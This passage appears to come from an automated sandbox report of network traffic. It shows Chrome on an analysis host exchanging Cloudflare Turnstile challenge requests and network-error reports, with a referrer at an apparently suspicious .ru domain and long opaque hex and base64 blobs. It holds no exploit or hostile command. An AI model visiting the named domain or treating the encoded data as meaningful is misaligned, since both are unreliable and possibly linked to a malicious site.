                                                            2025-01-15 16:02:07 UTC1369INData Raw: 33 78 37 53 6d 57 50 5a 47 71 52 57 33 4a 78 66 6d 36 51 61 31 42 6b 6c 59 61 49 58 32 79 66 6a 5a 61 62 6e 48 4a 35 64 6f 69 70 6f 5a 74 6d 6a 61 6d 6f 71 4c 4e 39 72 33 4f 72 73 35 65 58 69 4a 4f 34 74 36 6d 76 74 59 6d 33 73 36 56 38 75 37 65 77 6c 62 2b 37 74 4c 2f 44 76 37 36 49 78 38 50 44 78 62 58 42 6d 4d 50 50 79 38 71 79 6d 37 57 71 7a 62 4b 69 76 63 62 52 74 4c 6a 43 31 71 48 69 78 74 75 35 35 73 72 65 37 4f 72 4f 34 76 4c 75 30 75 62 33 79 66 6e 71 2b 76 62 5a 37 66 62 37 2f 4e 4c 5a 31 65 67 4b 41 76 7a 38 2f 63 34 41 38 66 33 6a 30 75 6a 30 36 51 73 51 46 78 45 4d 33 41 66 34 48 69 50 75 44 2f 77 44 47 76 55 61 35 68 38 70 4b 78 62 6e 36 52 41 50 43 43 63 4f 4d 75 77 43 44 42 55 70 37 53 2f 34 4b 68 41 34 4f 51 38 57 45 79 56 48 46 54 6b 35
                                                            Data Ascii: 3x7SmWPZGqRW3Jxfm6Qa1BklYaIX2yfjZabnHJ5doipoZtmjamoqLN9r3Ors5eXiJO4t6mvtYm3s6V8u7ewlb+7tL/Dv76Ix8PDxbXBmMPPy8qym7WqzbKivcbRtLjC1qHixtu55sre7OrO4vLu0ub3yfnq+vbZ7fb7/NLZ1egKAvz8/c4A8f3j0uj06QsQFxEM3Af4HiPuD/wDGvUa5h8pKxbn6RAPCCcOMuwCDBUp7S/4KhA4OQ8WEyVHFTk5


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.164973235.190.80.14436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:07 UTC535OUTOPTIONS /report/v4?s=MLscRZrzv7RzBaZ6VSP1fRDHyk5j%2FVISJPU7HCfQXVaqCxZmuxzhD%2FwkNCbjQInzEhXsDXffgy5w5ujr6pqEn6AsBUxXnr4Pfl0lw877s3Da2NOLBxPA2HIUiHF0qw%3D%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Origin: https://mstn.qomitarnor.ru
                                                            Access-Control-Request-Method: POST
                                                            Access-Control-Request-Headers: content-type
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:07 UTC336INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            access-control-max-age: 86400
                                                            access-control-allow-methods: POST, OPTIONS
                                                            access-control-allow-origin: *
                                                            access-control-allow-headers: content-length, content-type
                                                            date: Wed, 15 Jan 2025 16:02:07 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.1649734104.18.94.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:08 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:08 UTC442INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 15 Jan 2025 16:02:08 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 14
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: 0Rf0gZrIQDkcJMO2bO0+/CUeCyzZ1wVs31ZW8CgOCk5jKhq1cQRTtiyoXu+oUkxSX+yyUprZLF1vyoz4DKXs/A==$XDWAjkkV1GTAoZY17I2Muw==
                                                            Server: cloudflare
                                                            CF-RAY: 902716a0e9af15a7-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:08 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                            Data Ascii: {"err":100230}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.164973535.190.80.14436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:08 UTC474OUTPOST /report/v4?s=MLscRZrzv7RzBaZ6VSP1fRDHyk5j%2FVISJPU7HCfQXVaqCxZmuxzhD%2FwkNCbjQInzEhXsDXffgy5w5ujr6pqEn6AsBUxXnr4Pfl0lw877s3Da2NOLBxPA2HIUiHF0qw%3D%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 430
                                                            Content-Type: application/reports+json
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:08 UTC430OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 39 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 73 74 6e 2e 71 6f 6d 69 74 61 72 6e 6f 72 2e 72 75 2f 4a 59 31 48 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                                                            Data Ascii: [{"age":0,"body":{"elapsed_time":699,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://mstn.qomitarnor.ru/JY1H/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error",
                                                            2025-01-15 16:02:08 UTC168INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            date: Wed, 15 Jan 2025 16:02:08 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.1649736104.18.95.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:08 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/90271690994917b5/1736956927200/Z-kY-gEwytbJMdd HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:08 UTC200INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:08 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 902716a46e84c47c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:08 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0d 00 00 00 5c 08 02 00 00 00 3a 5b a8 79 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDR\:[yIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.1649737104.18.94.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:09 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/90271690994917b5/1736956927200/Z-kY-gEwytbJMdd HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:09 UTC200INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:09 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 902716a8398d0f6c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:09 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0d 00 00 00 5c 08 02 00 00 00 3a 5b a8 79 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDR\:[yIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.1649738104.18.95.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:09 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/90271690994917b5/1736956927204/056a419110721377e49177db5bf30d57c1fe1e6445ac46b00353113652a48a26/eWYiKqFvv6qKmlM HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=0
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:09 UTC143INHTTP/1.1 401 Unauthorized
                                                            Date: Wed, 15 Jan 2025 16:02:09 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 1
                                                            Connection: close
                                                            2025-01-15 16:02:09 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 42 57 70 42 6b 52 42 79 45 33 66 6b 6b 58 66 62 57 5f 4d 4e 56 38 48 2d 48 6d 52 46 72 45 61 77 41 31 4d 52 4e 6c 4b 6b 69 69 59 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gBWpBkRByE3fkkXfbW_MNV8H-HmRFrEawA1MRNlKkiiYAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                            2025-01-15 16:02:09 UTC1INData Raw: 4a
                                                            Data Ascii: J


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.1649740104.18.95.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:10 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 32208
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAz
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:10 UTC16384OUTData Raw: 76 5f 39 30 32 37 31 36 39 30 39 39 34 39 31 37 62 35 3d 7a 25 32 62 58 42 49 69 46 53 74 47 2b 4f 2b 4f 33 2b 46 67 46 47 78 39 69 47 4f 53 46 73 4f 31 4f 64 64 2b 46 71 4f 56 42 69 6d 4f 47 4f 4c 75 39 75 6d 46 30 68 4f 62 42 58 74 69 76 44 58 4f 7a 69 4f 69 52 46 56 4f 6e 58 4f 4b 67 24 39 6d 46 43 4f 55 52 65 77 58 47 42 46 53 4f 44 42 67 34 41 75 46 39 6b 53 36 4f 47 6d 6b 36 64 69 64 6b 6b 2b 57 2d 4f 64 6f 67 4f 53 42 72 4e 64 6a 75 4b 6d 4f 68 4f 5a 78 6f 73 33 33 67 72 36 42 46 6c 67 4f 4f 45 75 78 52 4f 53 68 78 4f 69 6d 5a 4a 38 6a 52 51 78 39 46 62 36 37 2b 74 66 4a 4d 67 42 4f 6a 51 36 4c 6b 58 63 39 78 52 4f 75 7a 38 39 36 69 42 24 4f 78 2b 4f 67 47 6d 66 39 38 53 43 79 33 52 75 39 55 70 52 6c 4a 68 42 67 33 57 30 63 6a 61 65 61 45 71 6d 63
                                                            Data Ascii: v_90271690994917b5=z%2bXBIiFStG+O+O3+FgFGx9iGOSFsO1Odd+FqOVBimOGOLu9umF0hObBXtivDXOziOiRFVOnXOKg$9mFCOURewXGBFSODBg4AuF9kS6OGmk6didkk+W-OdogOSBrNdjuKmOhOZxos33gr6BFlgOOEuxROShxOimZJ8jRQx9Fb67+tfJMgBOjQ6LkXc9xROuz896iB$Ox+OgGmf98SCy3Ru9UpRlJhBg3W0cjaeaEqmc
                                                            2025-01-15 16:02:10 UTC15824OUTData Raw: 76 42 46 59 4f 41 4f 38 4f 69 42 75 76 6b 2d 4d 30 6a 72 4f 77 61 67 78 72 6d 46 55 4f 4e 4f 55 53 69 74 4f 24 31 41 6d 6b 41 4f 35 4f 75 7a 46 4d 4f 67 42 7a 58 46 75 58 68 42 6e 74 4f 48 42 58 4f 6b 74 6b 50 4f 38 42 69 52 4f 33 4f 71 67 72 52 69 30 4f 6b 42 72 4f 6b 6e 4f 24 76 67 58 46 34 4f 51 4f 6b 38 4f 42 4f 47 42 72 39 6b 2b 4f 51 42 64 42 6b 2b 4f 70 4f 46 39 69 52 4f 66 4f 43 6d 46 42 4f 6c 4f 6f 42 46 52 39 77 42 67 78 4f 6a 46 38 39 43 73 6b 76 4f 73 2b 7a 42 4f 53 46 30 4f 47 5a 63 52 39 65 4f 51 42 46 78 4f 4e 33 43 39 6b 5a 4f 52 4f 64 42 69 41 46 72 4f 77 39 44 67 46 72 4f 69 58 75 72 6d 46 72 7a 42 4f 78 46 30 4f 55 76 42 42 4f 4a 48 57 66 4f 70 4f 76 4f 67 42 46 74 4f 75 4f 55 58 67 75 4f 4a 6d 44 52 4f 75 4f 6f 72 4f 4c 46 30 4f 71 67
                                                            Data Ascii: vBFYOAO8OiBuvk-M0jrOwagxrmFUONOUSitO$1AmkAO5OuzFMOgBzXFuXhBntOHBXOktkPO8BiRO3OqgrRi0OkBrOknO$vgXF4OQOk8OBOGBr9k+OQBdBk+OpOF9iROfOCmFBOlOoBFR9wBgxOjF89CskvOs+zBOSF0OGZcR9eOQBFxON3C9kZOROdBiAFrOw9DgFrOiXurmFrzBOxF0OUvBBOJHWfOpOvOgBFtOuOUXguOJmDROuOorOLF0Oqg
                                                            2025-01-15 16:02:10 UTC322INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:10 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 26348
                                                            Connection: close
                                                            cf-chl-gen: ystvaNBjcnoOXmYJqBu0f8D49pYDiZDcTCTuDGr+DLP2RQcYnxlHFgF6EtxrZw2Y$hE4wNwp19wfoBACwWKyQog==
                                                            Server: cloudflare
                                                            CF-RAY: 902716adcfcec346-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:10 UTC1047INData Raw: 52 6b 4e 39 68 34 56 4d 6a 56 71 52 5a 6c 4a 67 6a 70 57 44 65 46 68 75 64 6e 69 5a 58 61 42 38 6e 57 4a 33 63 35 68 6d 66 71 47 6a 6d 5a 65 56 62 49 47 63 67 4b 75 72 70 58 36 31 69 72 4b 49 6d 4b 65 38 64 62 75 35 6c 6e 75 37 72 61 4b 46 78 5a 6d 44 6d 4b 6d 68 7a 4d 58 4d 74 35 37 44 79 62 2b 50 70 4c 53 4a 32 4e 44 57 72 37 4b 50 32 4c 66 4c 7a 61 43 31 33 4c 33 6a 7a 39 43 6b 71 4e 6e 58 32 4b 7a 42 33 4f 4c 72 78 50 53 31 35 38 33 32 79 4e 72 52 2f 50 37 31 76 62 6e 39 38 2f 33 54 30 67 54 78 33 67 55 45 2b 66 66 36 7a 4f 45 4a 36 67 2f 6d 41 75 4c 56 43 2f 67 4d 46 42 54 57 31 75 6e 33 44 42 49 61 47 2f 55 52 42 2b 4d 53 39 43 72 6b 44 43 67 70 37 53 34 41 4d 66 45 6c 38 54 59 75 39 67 51 35 4a 43 63 4e 48 7a 67 70 47 79 49 69 47 79 52 44 51 43 59
                                                            Data Ascii: RkN9h4VMjVqRZlJgjpWDeFhudniZXaB8nWJ3c5hmfqGjmZeVbIGcgKurpX61irKImKe8dbu5lnu7raKFxZmDmKmhzMXMt57Dyb+PpLSJ2NDWr7KP2LfLzaC13L3jz9CkqNnX2KzB3OLrxPS15832yNrR/P71vbn98/3T0gTx3gUE+ff6zOEJ6g/mAuLVC/gMFBTW1un3DBIaG/URB+MS9CrkDCgp7S4AMfEl8TYu9gQ5JCcNHzgpGyIiGyRDQCY
                                                            2025-01-15 16:02:10 UTC1369INData Raw: 78 58 57 36 65 69 70 47 67 59 33 2b 52 71 58 70 32 68 32 4b 46 6e 4a 71 67 70 6e 71 6f 70 4a 5a 74 72 4b 69 68 68 72 43 73 70 62 43 30 73 4b 39 35 75 4c 53 30 74 71 61 79 69 62 54 41 76 4c 75 6a 6a 4b 61 62 76 71 4f 54 31 4d 6e 42 70 5a 53 7a 78 35 4c 54 74 38 79 71 75 39 48 66 33 4e 44 47 30 74 71 6e 76 4f 50 43 35 39 6a 4f 75 71 33 79 72 72 33 42 30 65 6e 72 77 72 50 4e 35 73 66 71 30 63 76 62 37 74 58 53 31 76 45 4a 77 41 72 32 33 64 54 48 42 63 72 68 7a 41 51 54 45 2b 4c 56 39 51 6a 6d 32 4d 30 4d 36 74 33 78 45 4f 37 66 48 68 6a 39 2f 68 67 48 2b 76 7a 6f 49 77 73 68 36 43 63 6f 45 42 51 6e 4c 7a 41 56 46 2f 58 33 2b 43 77 49 4c 69 38 41 4b 2f 30 36 4a 6a 4d 56 4f 53 63 6c 4e 43 6f 2b 47 44 35 41 53 54 30 77 52 44 34 2f 4e 52 56 4c 4f 45 4d 35 4a 68
                                                            Data Ascii: xXW6eipGgY3+RqXp2h2KFnJqgpnqopJZtrKihhrCspbC0sK95uLS0tqayibTAvLujjKabvqOT1MnBpZSzx5LTt8yqu9Hf3NDG0tqnvOPC59jOuq3yrr3B0enrwrPN5sfq0cvb7tXS1vEJwAr23dTHBcrhzAQTE+LV9Qjm2M0M6t3xEO7fHhj9/hgH+vzoIwsh6CcoEBQnLzAVF/X3+CwILi8AK/06JjMVOSclNCo+GD5AST0wRD4/NRVLOEM5Jh
                                                            2025-01-15 16:02:10 UTC1369INData Raw: 6e 58 70 39 6e 6f 61 6d 6c 36 69 6a 68 71 57 46 6e 6f 42 6c 68 6f 4f 56 74 6e 68 78 72 48 53 35 73 37 79 71 73 48 2b 55 74 49 33 45 6d 59 53 49 77 38 4b 68 69 36 43 38 6c 37 79 6e 30 72 50 4b 6e 6f 2b 70 7a 4d 75 33 73 70 65 64 71 74 69 73 33 35 36 33 34 65 4f 6a 6f 4e 32 6a 74 38 4b 73 78 39 6a 61 34 4b 2f 45 39 4d 48 73 74 50 4c 6a 32 62 62 6a 75 66 79 33 30 76 72 36 31 4c 7a 36 42 66 6d 2f 2b 66 77 44 77 64 76 74 43 78 41 47 45 51 33 69 34 42 50 2b 38 75 50 34 2b 50 48 36 47 52 6b 4c 45 64 2f 31 41 74 34 6b 35 52 41 6b 4b 52 55 47 48 79 7a 6d 35 79 49 6c 4c 42 4d 45 46 6a 4d 34 4d 54 63 6a 4c 44 4d 38 2b 79 38 73 49 76 34 73 52 6a 30 6a 46 30 59 39 50 51 56 4c 52 43 64 47 4c 6b 70 49 4d 54 56 4b 45 42 42 54 47 42 59 36 55 44 5a 4c 46 6a 42 44 4e 55 77
                                                            Data Ascii: nXp9noaml6ijhqWFnoBlhoOVtnhxrHS5s7yqsH+UtI3EmYSIw8Khi6C8l7yn0rPKno+pzMu3spedqtis35634eOjoN2jt8Ksx9ja4K/E9MHstPLj2bbjufy30vr61Lz6Bfm/+fwDwdvtCxAGEQ3i4BP+8uP4+PH6GRkLEd/1At4k5RAkKRUGHyzm5yIlLBMEFjM4MTcjLDM8+y8sIv4sRj0jF0Y9PQVLRCdGLkpIMTVKEBBTGBY6UDZLFjBDNUw
                                                            2025-01-15 16:02:10 UTC1369INData Raw: 48 74 6c 61 59 79 66 66 6e 42 6c 6f 34 4a 31 69 61 65 47 64 37 65 72 69 6e 74 34 72 34 35 2f 67 4c 4f 53 67 37 47 37 6d 73 69 38 6d 36 66 47 74 36 71 61 69 64 50 49 78 36 37 43 71 5a 65 73 79 4b 72 61 79 4c 6d 65 32 74 79 7a 73 38 61 38 35 36 48 69 34 36 54 69 37 4e 69 2b 76 4f 33 61 73 4c 54 6a 35 71 36 77 39 64 50 53 37 39 58 72 75 4d 7a 79 34 74 50 43 33 2f 55 44 77 66 6a 56 39 74 34 43 42 4f 48 65 42 41 73 45 34 67 6e 2b 43 42 59 59 31 39 54 55 36 74 62 7a 38 75 2f 63 44 4f 38 66 46 66 4d 43 41 41 55 4b 39 67 45 4b 44 6a 48 6f 37 52 38 6c 4b 2f 34 74 4b 53 4d 74 4d 53 30 66 39 54 55 78 4b 67 38 35 4e 53 34 35 50 54 6b 34 41 6b 45 39 50 54 38 76 4f 78 49 39 53 55 56 45 4c 42 55 76 4a 45 63 73 48 45 34 6f 54 53 35 59 50 46 41 62 58 45 42 56 4d 32 42 45
                                                            Data Ascii: HtlaYyffnBlo4J1iaeGd7erint4r45/gLOSg7G7msi8m6fGt6qaidPIx67CqZesyKrayLme2tyzs8a856Hi46Ti7Ni+vO3asLTj5q6w9dPS79XruMzy4tPC3/UDwfjV9t4CBOHeBAsE4gn+CBYY19TU6tbz8u/cDO8fFfMCAAUK9gEKDjHo7R8lK/4tKSMtMS0f9TUxKg85NS45PTk4AkE9PT8vOxI9SUVELBUvJEcsHE4oTS5YPFAbXEBVM2BE
                                                            2025-01-15 16:02:10 UTC1369INData Raw: 71 70 6e 5a 2b 72 63 49 65 56 6b 4c 75 34 75 4c 69 5a 6a 36 6d 7a 67 35 4f 68 6e 4d 64 2f 77 63 4f 45 77 73 71 69 70 63 62 51 75 38 69 67 30 4a 53 4f 71 71 65 58 30 70 7a 4d 6c 5a 58 61 32 72 61 2b 72 39 33 6d 70 5a 2b 31 78 4b 62 66 37 4d 44 4e 76 4d 69 70 33 73 79 7a 79 4c 53 78 2b 4d 72 6d 39 4e 54 38 32 66 50 77 7a 66 72 54 34 4e 77 49 42 51 55 46 35 65 48 31 41 41 76 66 36 2b 67 53 45 41 38 51 43 4f 6f 4b 45 52 67 4e 44 67 63 4d 33 68 6b 61 4a 4e 38 68 34 53 67 56 49 66 77 59 41 79 48 72 4b 66 77 77 4c 52 49 74 4c 53 33 31 42 79 73 79 42 69 6f 30 4a 78 34 67 4f 67 49 57 4a 6b 51 44 45 78 4e 41 4c 42 63 58 52 45 67 4a 53 30 6c 4e 4c 6a 39 55 4b 69 49 35 57 53 31 55 58 46 5a 56 55 46 68 62 54 44 5a 65 58 56 35 59 5a 32 67 2f 56 47 64 66 51 47 30 37 61
                                                            Data Ascii: qpnZ+rcIeVkLu4uLiZj6mzg5OhnMd/wcOEwsqipcbQu8ig0JSOqqeX0pzMlZXa2ra+r93mpZ+1xKbf7MDNvMip3syzyLSx+Mrm9NT82fPwzfrT4NwIBQUF5eH1AAvf6+gSEA8QCOoKERgNDgcM3hkaJN8h4SgVIfwYAyHrKfwwLRItLS31BysyBio0Jx4gOgIWJkQDExNALBcXREgJS0lNLj9UKiI5WS1UXFZVUFhbTDZeXV5YZ2g/VGdfQG07a
